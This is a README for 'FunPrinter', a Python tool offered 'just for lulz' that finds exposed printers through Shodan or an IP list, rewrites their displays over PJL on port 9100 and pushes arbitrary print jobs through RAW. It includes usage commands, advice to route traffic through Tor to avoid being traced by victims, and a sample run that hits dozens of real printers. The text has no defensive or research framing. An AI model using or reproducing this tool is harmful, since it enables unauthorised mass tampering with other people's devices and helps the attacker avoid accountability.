
Massive attacks to printers

Primary LanguagePython


 /___________/___//||   -- FunPrinter By FunSec --
|===        |----| ||
|           |   ô| ||
|___________|   ô| ||
| ||/.´---.||    | ||
|-||/_____\||-.  | |´

What is FunPrinter?

FunPrinter is a tool for perpetrating massive attacks on printers written by FunSec just for lulz.
The tool has two modes:

--mode shodan
--mode list 


The shodan mode searches for devices on the internet of things thanks to shodan api. To use this mode you will need yout own API key of shodan.


List mode reads a specific list and loads them into the program.
Example list:


--message <message_here>

This argument will specify the message that will be displayed on the printer's screen in case the printer uses PJL through port 9100.

--message Hacked
Result (Old picture)


TOR (Optional)

You can use tor to hide your identity (Recommended) so that no angry businessman tries to find you. To do this add --tor in the command of the script.

socks.set_default_proxy(socks.SOCKS5, '', 9050)

This line of code set the tor proxy in the script. Change the port if you need.

How to use Usage

The first step is to have a file that you want to print on printers that have RAW protocol enabled.

funsec@funsec # cat test.txt  
I hack you LMAO

If you use this file without going through A4.py it will not print correctly in the printer. The "test.txt" file needs to be a complete page.

Then you need to execute this command:

kek@kek-PC # python A4.py test.txt
By FunSec with love ;)

After this simple step ... Happy hacking!.


kek@kek-PC # python funny.py --mode list --arg list.txt --message Succ! --tor myfile
 /___________/___//||   -- FunPrinter By FunSec --
|===        |----| ||
|           |   ô| ||
|___________|   ô| ||
| ||/.´---.||    | ||
|-||/_____\||-.  | |´

[TOR] Verifying the connection to the proxy
[TOR] Actual IP:
[LIST] Reading list
[LIST] Done!. 199 ips loaded
[] Connecting...
[] Connection failed
[] Connecting...
[] Connection failed
[] Connecting...
[] Connection failed
[] Connecting...
[] Connected!
[] Testing PJL
[] Test completed!
[] RICOH MP C4503
[] Changing the display screen to Succ!
[] Done!. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] RAW protocol detected. Sending file
[] Done!. Closing the connection
[] Connecting...
[] Connection failed
[] Connecting...
[] Connected!
[] Testing PJL
[] RAW protocol detected. Sending file
[] Done!. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Test completed!
[] Samsung M337x 387x 407x Series
[] Changing the display screen to Succ!
[] Done!. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] RAW protocol detected. Sending file
[] Done!. Closing the connection
[] Connecting...
[] Connected!
[] Testing PJL
[] Protocol not supported. Closing the connection


python2.7 (Best version of python LMAO)
pip for python2.7

After having these two essential requirements, it is necessary to install the following modules with "pip install module" although this step can be done semiautomatically.


Modules to install:

PySocks, colorama, argparse, shodan

WARNING: Install all modules individually

pip install PySocks


C:\Python27\Scripts\pip.exe install PySocks


Run this command in yout shell m8

pip install -r requeriments.txt


C:\Python27\Scripts\pip.exe install -r requeriments.txt